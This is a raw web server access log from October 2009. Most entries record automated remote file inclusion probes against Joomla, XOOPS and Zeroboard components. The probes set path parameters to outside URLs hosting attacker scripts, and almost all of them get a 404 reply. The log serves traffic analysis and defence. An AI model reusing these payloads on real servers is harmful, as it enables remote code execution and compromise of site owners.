218.38.243.71 - - [18/Oct/2009:01:00:18 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.249.71.152 - - [18/Oct/2009:01:00:35 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0135794C96489900DEE806W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.143.3.188 - - [18/Oct/2009:01:00:39 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
174.143.3.188 - - [18/Oct/2009:01:00:39 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
174.143.3.188 - - [18/Oct/2009:01:00:39 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
174.143.3.188 - - [18/Oct/2009:01:00:39 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Microsoft Pocket Internet Explorer/0.6"
209.59.12.99 - - [18/Oct/2009:01:00:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.193.251.57 - - [18/Oct/2009:01:02:35 -0400] "GET /logs//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
216.193.251.57 - - [18/Oct/2009:01:02:35 -0400] "GET //skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.193.251.57 - - [18/Oct/2009:01:02:35 -0400] "GET /logs/access_log.Q109072500//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
216.193.251.57 - - [18/Oct/2009:01:02:35 -0400] "GET /logs/access_log.Q109072200//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
216.193.251.57 - - [18/Oct/2009:01:02:48 -0400] "GET //skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.193.251.57 - - [18/Oct/2009:01:02:48 -0400] "GET /logs/access_log.Q109072500//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
216.193.251.57 - - [18/Oct/2009:01:02:48 -0400] "GET /logs//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
216.193.251.57 - - [18/Oct/2009:01:02:48 -0400] "GET /logs/access_log.Q109072200//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
122.37.68.61 - - [18/Oct/2009:01:03:40 -0400] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://isodevil.sitebr.net/fx29id.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
122.37.68.61 - - [18/Oct/2009:01:03:40 -0400] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://isodevil.sitebr.net/fx29id.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
122.37.68.61 - - [18/Oct/2009:01:03:40 -0400] "GET /logs/error_log.Q109070900%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://isodevil.sitebr.net/fx29id.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
122.37.68.61 - - [18/Oct/2009:01:04:23 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://isodevil.sitebr.net/fx29id.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:04:43 -0400] "GET /logs/access_log.Q109051900/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:05:28 -0400] "GET /logs/access_log.Q109051900/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:01:05:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.37.68.61 - - [18/Oct/2009:01:06:37 -0400] "GET /logs/error_log.Q109070900//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://isodevil.sitebr.net/fx29id.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:06:59 -0400] "GET /logs/access_log.Q109051900/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:07:13 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:07:14 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:07:14 -0400] "GET /logs/access_log.Q109050800%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:07:17 -0400] "GET /logs/access_log.Q109051900/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:07:20 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:07:22 -0400] "GET /logs/access_log.Q109050800%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:07:22 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
128.121.225.12 - - [18/Oct/2009:01:07:34 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://messenger.bplaced.net/id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
128.121.225.12 - - [18/Oct/2009:01:07:35 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://messenger.bplaced.net/id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
128.121.225.12 - - [18/Oct/2009:01:07:35 -0400] "GET /logs/access_log.Q109082100%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://messenger.bplaced.net/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.37.68.61 - - [18/Oct/2009:01:07:36 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://isodevil.sitebr.net/fx29id.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
76.89.226.19 - - [18/Oct/2009:01:08:00 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://us.mc564.mail.yahoo.com/mc/welcome?.gx=0&.tm=1255842547&.rand=5d8gvlis4vlov" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.30.78.230 - - [18/Oct/2009:01:08:00 -0400] "GET /logs/error_log.Q109072500 HTTP/1.0" 200 2346594 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.230 - - [18/Oct/2009:01:08:09 -0400] "GET /logs/error_log.Q109072500 HTTP/1.0" 200 2346594 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.211.6.161 - - [18/Oct/2009:01:08:49 -0400] "GET /logs/access_log.Q109082900//?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
95.211.6.161 - - [18/Oct/2009:01:08:49 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
95.211.6.161 - - [18/Oct/2009:01:08:49 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 200 22327 "-" "Mozilla/5.0"
128.121.225.12 - - [18/Oct/2009:01:09:51 -0400] "GET /logs/access_log.Q109080400%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://messenger.bplaced.net/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
95.211.6.161 - - [18/Oct/2009:01:10:07 -0400] "GET /logs/access_log.Q109082900%20%20//?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.193.251.57 - - [18/Oct/2009:01:10:16 -0400] "GET /logs/access_log.Q109072500%20%20//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
216.193.251.57 - - [18/Oct/2009:01:10:16 -0400] "GET /logs/access_log.Q109072200%20%20//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
216.193.251.57 - - [18/Oct/2009:01:10:18 -0400] "GET /logs/access_log.Q109072500%20%20//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
216.193.251.57 - - [18/Oct/2009:01:10:18 -0400] "GET /logs/access_log.Q109072200%20%20//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.mebel12.ru/admin//fx29id.txt??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
95.211.6.161 - - [18/Oct/2009:01:10:20 -0400] "GET /logs/access_log.Q109082800%20%20//?_SERVER[DOCUMENT_ROOT]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:10:26 -0400] "GET /logs/access_log.Q109051900%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.37.68.61 - - [18/Oct/2009:01:10:33 -0400] "GET /logs/access_log.Q109070900//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://isodevil.sitebr.net/fx29id.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
218.38.243.71 - - [18/Oct/2009:01:10:34 -0400] "GET /logs/access_log.Q109051900%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:01:10:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.143.3.188 - - [18/Oct/2009:01:11:25 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
174.143.3.188 - - [18/Oct/2009:01:11:25 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/3.0 (OS/2; U)"
174.143.3.188 - - [18/Oct/2009:01:11:25 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Advanced Browser (http://www.avantbrowser.com)"
174.143.3.188 - - [18/Oct/2009:01:11:25 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Avant Browser (http://www.avantbrowser.com)"
211.133.251.119 - - [18/Oct/2009:01:12:34 -0400] "GET //manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:12:34 -0400] "GET /logs//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:12:34 -0400] "GET /logs/access_log.Q109070500//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:12:40 -0400] "GET /logs//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:12:40 -0400] "GET //manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:12:40 -0400] "GET /logs/access_log.Q109070500//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:12:48 -0400] "GET //manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:12:48 -0400] "GET /logs/access_log.Q109070500%20%20//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:12:49 -0400] "GET /logs/access_log.Q109070500%20%20//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:12:49 -0400] "GET //manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:12:49 -0400] "GET /logs//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:12:50 -0400] "GET /logs//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:13:53 -0400] "GET /logs/access_log.Q109082800//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:14:03 -0400] "GET /logs/access_log.Q109082800//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:14:35 -0400] "GET //manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:14:35 -0400] "GET /logs/access_log.Q109070500//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:14:35 -0400] "GET /logs//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:14:38 -0400] "GET /logs/access_log.Q109082800%20%20//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:14:39 -0400] "GET /logs/access_log.Q109082800%20%20//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:14:45 -0400] "GET /logs/access_log.Q109082800//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:01:15:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.133.251.119 - - [18/Oct/2009:01:15:58 -0400] "GET //manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:15:58 -0400] "GET /logs/access_log.Q109070500//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:15:58 -0400] "GET /logs//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.133.251.119 - - [18/Oct/2009:01:16:09 -0400] "GET /logs/access_log.Q109082800//manual/en/function.strftime.php?_zb_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
72.30.78.230 - - [18/Oct/2009:01:15:47 -0400] "GET /logs/access_log.Q109092500 HTTP/1.0" 200 4210520 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
128.121.225.12 - - [18/Oct/2009:01:17:14 -0400] "GET /logs/access_log.Q109080400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://messenger.bplaced.net/id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
190.3.107.130 - - [18/Oct/2009:01:18:18 -0400] "GET /logs/zb41/include/write.php?dir=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.3.107.130 - - [18/Oct/2009:01:18:18 -0400] "GET /logs/access_log.Q109053100%20%20/zb41/include/write.php?dir=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
190.3.107.130 - - [18/Oct/2009:01:18:18 -0400] "GET /zb41/include/write.php?dir=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:44 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:44 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:44 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:45 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:45 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:45 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:46 -0400] "GET /logs/access_log.Q109100200%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:46 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:46 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:46 -0400] "GET /logs/access_log.Q109090300%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:49 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:49 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:49 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:50 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:50 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:50 -0400] "GET /logs/access_log.Q109100200%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:50 -0400] "GET /logs/access_log.Q109090300%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:51 -0400] "GET /logs/access_log.Q109090300//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:51 -0400] "GET /logs/access_log.Q109090300//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:54 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:54 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:54 -0400] "GET /logs/access_log.Q109100200%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.150.183.219 - - [18/Oct/2009:01:19:54 -0400] "GET /logs/access_log.Q109090300%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
